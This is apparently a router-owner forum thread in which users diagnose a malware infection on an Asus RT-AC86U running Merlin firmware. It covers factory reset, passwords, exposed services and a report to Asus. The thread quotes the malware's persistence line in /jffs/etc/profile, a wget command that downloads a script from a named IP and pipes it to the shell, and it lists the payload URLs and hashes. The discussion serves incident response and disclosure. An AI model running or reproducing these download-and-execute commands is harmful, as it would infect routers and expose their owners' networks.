cp: can't stat '/jffs/security_check': No such file or directory

[icehacker]

Hi All,

RT-AC86U On 386.2_4 getting the following error when i run amtm > u.

cp: can't stat '/jffs/security_check': No such file or directory
chmod: /tmp/check: No such file or directory
-sh: /jffs/etc/profile: /tmp/check: not found

 

[RMerlin]

security_check is probably removed by the firmware's malware scanner. What script uses it?

 

[icehacker]

Thanks for the reply RMerlin.

ASUSWRT-Merlin RT-AC86U 386.2_4 Fri Apr 30 21:01:21 UTC 2021
rtradmin@RT-AC86U:/tmp/home/root# cat /jffs/etc/profile
(sleep 70; cp /jffs/security_check /tmp/check; chmod 777 /tmp/check; /tmp/check)&

Also didn't get this error/msg before 386.2_2

 

[Jack Yaz]

is it just me or does that look like malware?

 

[ColinTaylor]

is it just me or does that look like malware?

Exactly what I was thinking. Either that or he's installed some bespoke scripting of his own.

 

[icehacker]

is it just me or does that look like malware?

Hence the post.

removed "/jffs/etc/profile"

rtradmin@RT-AC86U:/tmp/home/root# ls -ltrah /jffs/security_check
ls: /jffs/security_check: No such file or directory
rtradmin@RT-AC86U:/tmp/home/root# ls -ltrah /tmp/check
ls: /tmp/check: No such file or directory
rtradmin@RT-AC86U:/tmp/home/root# ls -ltrah /jffs/etc/profile
ls: /jffs/etc/profile: No such file or directory
rtradmin@RT-AC86U:/tmp/home/root#

 

[icehacker]

Exactly what I was thinking. Either that or he's installed some bespoke scripting of his own.

Hmm. I did't install anything else...

How do I check for malware on asus routers...

 

[ColinTaylor]

Did this router ever have a non-stock or non-Merlin firmware installed on it? Some of the illegal Chinese versions like Koolshare put similar things in /jffs.

The best thing would be to do a factory reset and reformat the jffs partition.

 

[icehacker]

Did this router ever have a non-stock or non-Merlin firmware installed on it? Some of the illegal Chinese versions like Koolshare put similar things in /jffs.

The best thing would be to do a factory reset and reformat the jffs partition.

Nope

Will do a factory reset and reformat the jffs partition.

Thanks @ColinTaylor

 

[icehacker]

ATM, removed the file /jffs/etc/profile

rtradmin@RT-AC86U:/tmp/home/root# rm -rf /jffs/etc/profile
rtradmin@RT-AC86U:/tmp/home/root# cat /jffs/etc/profile
cat: can't open '/jffs/etc/profile': No such file or directory
rtradmin@RT-AC86U:/tmp/home/root# cat /tmp/check
cat: can't open '/tmp/check': No such file or directory
rtradmin@RT-AC86U:/tmp/home/root# cat /jffs/security_check
cat: can't open '/jffs/security_check': No such file or directory

& Rebooted, dont see any traces. Will do a factory reset and reformat the jffs partition asap.

 

[RMerlin]

Ok, unless a script developer comes forward to claim ownership of that script, I will tell Asus to continue treating this file as malware. You were getting the error message because the file got removed by Asus's security daemon.

If your router is exposing its web interface to the Internet, I strongly recommend you disable that, and use a VPN instead for remote management.

And since you were previously infected and we have no idea what was done to your router, it would probably a good idea to change any password you had configured on that router.


If anyone ever gets his hand on a copy of that file, please contact me so I can arrange for sending a copy of that file to Asus for further analysis.

 

[dave14305]

So was this really tied to running amtm, or was it just coincidence that you were running amtm 70 seconds after logging in and auto-loading your profile?

Any jffs backups that might still have the file in it?

 

[icehacker]

1. Removed all partitions and cleared the partition table on USB3 1tb hdd, Formatted jffs, Reset router (Firmware Reset)
2. Hold (Reset Button) and Powered on router
3. via cfe (page: details below), Uploaded 386_2_4 firmware
4. Setup router & Changed passwords

If your router is exposing its web interface to the Internet, I strongly recommend you disable that, and use a VPN instead for remote management.

Other than AiCloud On 443, Nope

And since you were previously infected and we have no idea what was done to your router, it would probably a good idea to change any password you had configured on that router.

Changed all passwords, However can someone confirm the cfe page for RT-AC96U looks like below.

So was this really tied to running amtm, or was it just coincidence that you were running amtm 70 seconds after logging in and auto-loading your profile?

Got the following after running amtm and then u (Check Updates)

cp: can't stat '/jffs/security_check': No such file or directory
chmod: /tmp/check: No such file or directory
-sh: /jffs/etc/profile: /tmp/check: not found

Any jffs backups that might still have the file in it?

Only (/jffs/etc/profile)

rtradmin@RT-AC86U:/tmp/home/root# cat /jffs/etc/profile
(sleep 70; cp /jffs/security_check /tmp/check; chmod 777 /tmp/check; /tmp/check)&

Any jffs backups that might still have the file in it?

couldn't ever get hands on (/jffs/security_check)

 

[icehacker]

My Router got hit again

ASUSWRT-Merlin RT-AC86U 386.2_6 Sun Jun 6 16:35:11 UTC 2021
RT-AC86U:/tmp/home/root# /tmp/check: line 1: syntax error: unexpected "("

RT-AC86U:/tmp/home/root# ls -ltrah /jffs/checksumm
-rw-rw-rw- 1 rtradmin root 123.6K Jul 4 15:50 /jffs/checksumm
RT-AC86U:/tmp/home/root# ls -ltrah /tmp/check
-rwxrwxrwx 1 rtradmin root 123.6K Jul 7 11:16 /tmp/check
RT-AC86U:/tmp/home/root# ls -ltrah /jffs/etc/profile
-rwxrwxrwx 1 rtradmin root 174 Jul 4 17:12 /jffs/etc/profile
RT-AC86U:/tmp/home/root# md5sum /jffs/checksumm
a5b8248a1bd25f41ef67c6fef89160ef /jffs/checksumm
RT-AC86U:/tmp/home/root# md5sum /tmp/check
a5b8248a1bd25f41ef67c6fef89160ef /tmp/check
RT-AC86U:/tmp/home/root# cat /jffs/etc/profile
(sleep 70; if [ ! -f /jffs/checksumm ]; then wget -O- http://194.36.190.99:38291/as/downl_crt.sh | ash; fi; cp /jffs/checksumm /tmp/check; chmod 777 /tmp/check; /tmp/check)&

So far I just blocked ips

sh /jffs/scripts/firewall ban sainnguatc.com
sh /jffs/scripts/firewall ban ip 194.36.190.99
sh /jffs/scripts/firewall ban ip 91.211.88.6

Searched for files with same md5 hash and deleted them.

RT-AC86U:/tmp/home/root# find / -type f -not -path "/proc/*" -not -path "/sys/*" -exec md5sum {} + | grep '^a5b8248a1bd25f41ef67c6fef89160ef'
a5b8248a1bd25f41ef67c6fef89160ef /tmp/check
a5b8248a1bd25f41ef67c6fef89160ef /jffs/checksumm

RT-AC86U:/# rm -rf /tmp/check
RT-AC86U:/# rm -rf /jffs/checksumm

Changed all passwords / keys


Link : VirusTotal
Link : Sha256: 3434839b2392f6fc729f428ac1eeb989b6c79e366e95b5236d8deaafd7489bf4 - AlienVault - Open Threat Exchange

Password : 3434839b2392f6fc729f428ac1eeb989b6c79e366e95b5236d8deaafd7489bf4

 

[ColinTaylor]

Interesting. Luckily for you the downloader script seems to have misidentified your router as a MIPS device and downloaded the wrong executable.

 

[RMerlin]

If AiMesh is your only service open to the WAN, then I recommend disabling that. It would indicate that this is the attack vector, if you are sure that your WAN interface itself is not open to the WAN.

I'll report the info to Asus so they can eventually block/clean it through their malware scanner.

 

[RMerlin]

Asus notified, they will take care of it.

I also noticed that as of today, Eset is also blocking access to that payload website.

 

[icehacker]

Interesting. Luckily for you the downloader script seems to have misidentified your router as a MIPS device and downloaded the wrong executable.

That's a relief. Thanks ColinTaylor

If AiMesh is your only service open to the WAN, then I recommend disabling that. It would indicate that this is the attack vector, if you are sure that your WAN interface itself is not open to the WAN.

Disabled AICloud

Thanks RMerlin

QQ :

1. Why is my ip resolving to dns9.parkpage.foundationapi.com ?
2. Why aren't any of the av (Windows Defender, McAfee, ClamAV) not flagging this file ?

 

[icehacker]

Asus notified, they will take care of it.

I also noticed that as of today, Eset is also blocking access to that payload website.

Cool Thanks

 

[icehacker]

++

http://194.36.190.99:38291/as/crtmipsel3

http://194.36.190.99:38291/as/crtarm3